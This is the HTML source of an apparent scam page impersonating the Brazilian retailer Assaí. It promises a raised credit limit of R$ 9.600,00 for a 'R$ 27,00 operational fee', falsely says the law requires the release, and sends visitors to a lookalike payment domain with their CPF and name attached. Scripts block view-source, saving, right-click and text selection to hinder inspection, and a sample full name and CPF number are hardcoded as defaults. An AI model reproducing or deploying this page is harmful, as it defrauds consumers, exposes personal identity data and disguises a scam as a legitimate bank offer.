<!DOCTYPE html><html lang="pt-BR"><head>

    <meta charset="UTF-8">
    <link href="up1/css/bootstrap.min.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    
    <script>
        localStorage.setItem("upsell", "up2");
    </script>


    <style>
    .header {
        background-color: #1E3A80;
        padding: 15px 0;
        text-align: center;
        font-size: 1.5rem;
        font-weight: bold;
        border-bottom: solid 3px  #ee4d2d;
    }
    .main-content {
        max-width: 450px;
        background-color: white;
        text-align: center;
        padding: 2rem 2rem 1rem 2rem;
        border-radius: 10px;
        box-shadow: 0 2px 40px rgba(0, 0, 0, 0.1);
        margin: 0 auto;
    }
    .main-content h2 {
        margin-bottom: 20px;
    }
    .btn-custom {
        color: white;
        border: none;
        width: 100%;
        margin-bottom: 10px;
        background: #1E3A80;
        font-weight: 600;
        border-radius: 1rem;
        padding: .75rem 3rem;
        letter-spacing: .3px;
        line-height: 1.15;
    }
    .btn-custom:hover{
        color: white !important;
        background-color:  #1E3A80;
        transform: scale(1.02) !important;
    }
    
    .footer {
        background: #ffffff;
        border-top: 1px solid #e6e6e6;
        text-align: center;
        padding: 15px;
        font-size: 10px;
        color: #666;
    }
    
    #conclusao {
        display: none; /* Esconde o elemento por padrão */
    }
    
    #conclusao h4 {
        color: green; /* Define a cor do texto */
        font-weight: bold; /* Define o texto em negrito */
    }
    
    .char {
        border-top: solid px #00adca;
        background-color: #00adca;
        padding: 2px !important;
    }/* End custom CSS */
    </style>
    <script>
if (document.addEventListener) {
    document.addEventListener("keydown", bloquearSource);
} else { //Versões antigas do IE
    document.attachEvent("onkeydown", bloquearSource);
}

function bloquearSource(e) {
    e = e || window.event;

    var code = e.which || e.keyCode;

    if (
        e.ctrlKey &&
        (code == 83 || code == 85) //83 = S, 85 = U
    ) {
        if (e.preventDefault) {
            e.preventDefault();
        } else {
            e.returnValue = false;
        }

        return false;
    }
}
</script>
<style>
/*desabilita a seleção no body*/
body {
    -webkit-touch-callout: none; /* iOS Safari */
      -webkit-user-select: none; /* Chrome/Safari/Opera */
       -khtml-user-select: none; /* Konqueror */
         -moz-user-select: none; /* Firefox */
          -ms-user-select: none; /* Internet Explorer/Edge */
              user-select: none;
}

/*habilita a seleção nos campos editaveis*/
input, textarea {
    -webkit-touch-callout: initial; /* iOS Safari */
      -webkit-user-select: text; /* Chrome/Safari/Opera */
       -khtml-user-select: text; /* Konqueror */
         -moz-user-select: text; /* Firefox */
          -ms-user-select: text; /* Internet Explorer/Edge */
              user-select: text;
}

/*habilita a seleção nos campos com o atributo contenteditable*/
[contenteditable=true] {
    -webkit-touch-callout: initial; /* iOS Safari */
      -webkit-user-select: all; /* Chrome/Safari/Opera */
       -khtml-user-select: all; /* Konqueror */
         -moz-user-select: all; /* Firefox */
          -ms-user-select: all; /* Internet Explorer/Edge */
              user-select: all;
}
</style>

<script>
if (document.addEventListener) {
    document.addEventListener("contextmenu", function(e) {
        e.preventDefault();
        return false;
    });
} else { //Versões antigas do IE
    document.attachEvent("oncontextmenu", function(e) {
        e = e || window.event;
        e.returnValue = false;
        return false;
    });
}
</script>
<script>
  window.pixelId = "68cb78856141a2ab904ccacf";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<script
  src="https://cdn.utmify.com.br/scripts/utms/latest.js"
  data-utmify-prevent-xcod-sck
  data-utmify-prevent-subids
  async
  defer
></script>
</head>

<body>
    
    
<div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">
    <div class="header">
          <img decoding="async" style="width: 120px;" src="up1/images/logo.svg" alt="Imagem Centralizada">
      </div>
    
   <div style="grid-area: content; padding: 0 1rem;">
        <div style="margin-top: 18px;" class="main-content text-center">
        <h1 style="color: #27ae60;">Ótimas notícias!</h1>
        <p>Após uma nova análise automatizada, identificamos que você tem um limite maior disponível com acesso ao Assaí Card Black</p> 
        <p style="color: black;">Somos obrigados por lei a liberar o maior limite disponível para você, mas será necessário reenviar o pedido do cartão, inclusive o virtual, e infelizmente isso tem um pequeno custo.<br>
        (tarifa operacional: R$ 27,00)</p>

        <h4 class="text-pink" style="font-weight: bold;color: black;">Seu Novo Limite: R$ 9.600,00</h4><style>
      

        .gif-container {
            text-align: center;
        }

        .gif-container img {
            max-width: 100%;
            height: auto;
        }
    </style>

    <div class="gif-container">
        <img src="up1/images/cartao-credito-black-capa2019-02.jpg" alt="Exemplo de GIF">
    </div><div style="background-color: #f5f7f9;" class="card p-3 my-4">

            <p style="color: black;font-weight: 600;">Além do seu limite aumentado, você recebe:</p>
            
            <ul class="text-start custom-list" style="list-style: none;">
                <li>
                    <svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" class="icon iconify iconify--ph" width="16" height="16" viewBox="0 0 256 256" style="vertical-align: middle; margin-right: 8px;">
                        <path fill="black" d="M128 24a104 104 0 1 0 104 104A104.11 104.11 0 0 0 128 24m45.66 85.66l-56 56a8 8 0 0 1-11.32 0l-24-24a8 8 0 0 1 11.32-11.32L112 148.69l50.34-50.35a8 8 0 0 1 11.32 11.32"></path>
                    </svg>Cartão Virtual para uso imediato (R$ 9.600,00 de limite)</li>
                <li>
                    <svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" class="icon iconify iconify--ph" width="16" height="16" viewBox="0 0 256 256" style="vertical-align: middle; margin-right: 8px;">
                        <path fill="black" d="M128 24a104 104 0 1 0 104 104A104.11 104.11 0 0 0 128 24m45.66 85.66l-56 56a8 8 0 0 1-11.32 0l-24-24a8 8 0 0 1 11.32-11.32L112 148.69l50.34-50.35a8 8 0 0 1 11.32 11.32"></path>
                    </svg>Acesso a empréstimo pessoal pré-aprovado de até 7 mil reais</li>
                <li>
                    <svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" class="icon iconify iconify--ph" width="16" height="16" viewBox="0 0 256 256" style="vertical-align: middle; margin-right: 8px;">
                        <path fill="black" d="M128 24a104 104 0 1 0 104 104A104.11 104.11 0 0 0 128 24m45.66 85.66l-56 56a8 8 0 0 1-11.32 0l-24-24a8 8 0 0 1 11.32-11.32L112 148.69l50.34-50.35a8 8 0 0 1 11.32 11.32"></path>
                    </svg>Cartão Virtual adicional com R$ 3.000,00 de limite pré-aprovado</li>
                
                <li>
                    <svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" role="img" class="icon iconify iconify--ph" width="16" height="16" viewBox="0 0 256 256" style="vertical-align: middle; margin-right: 8px;">
                        <path fill="black" d="M128 24a104 104 0 1 0 104 104A104.11 104.11 0 0 0 128 24m45.66 85.66l-56 56a8 8 0 0 1-11.32 0l-24-24a8 8 0 0 1 11.32-11.32L112 148.69l50.34-50.35a8 8 0 0 1 11.32 11.32"></path>
                    </svg>70% de desconto nos serviços de Streaming (Netflix, Amazon Prime, Disney Plus, HBO Max)</li>
            </ul>
            
            
            <div class="text-center">
                
            </div>
            
        </div>

        <p class="text-pink">Custo operacional do aumento de limite:</p><h3 class="text-pink"><strong>R$ 27,00</strong></h3><a onclick="redirectCheckout();" style="text-decoration: none;" id="7c12fc44-d9b0-b81f-7fa8-c220c3779c57">
          <button onclick="redirectCheckout();" type="button" id="ativarConta" class="btn btn-custom rounded-pill w-100 mt-3">Quero aumentar meu limite</button>
           </a><p><a onclick="redirectCheckout();" style="text-decoration: none;" id="7c12fc44-d9b0-b81f-7fa8-c220c3779c57"></a></p>
        </div>
    </div>    

        
        </div>
            
    

    <!-- Footer -->
    <div class="footer">
Copyright © 2025 Assaí. Todos os direitos reservados.<br>

Política de Privacidade | Termos de Uso Vendas e Reembolsos | Legal Mapa do Site
    </div>


    <script>
        function redirectCheckout() {
            localStorage.setItem('type', 'up1');
    
            // Busca os dados do CPF do localStorage (vindos da pasta 4)
            const dadosCPF = JSON.parse(localStorage.getItem('dadosCPF')) || { 
                nomeCompleto: "MICHAEL FRANCA DOS SANTOS", 
                cpf: "33311996801"
            };

            // Constrói a URL do Assaí com os parâmetros
            const baseUrl = "https://pay.pag-segurotax.space/v7R0gloO1nNGVr9";
            const documentParam = dadosCPF.cpf || "33311996801";
            const nameParam = encodeURIComponent(dadosCPF.nomeCompleto || "MICHAEL FRANCA DOS SANTOS");
            
            const finalUrl = `${baseUrl}?document=${documentParam}&name=${nameParam}`;
            
            // Redireciona para a URL do Assaí
            window.location.href = finalUrl;
        }
    </script>


</body></html>
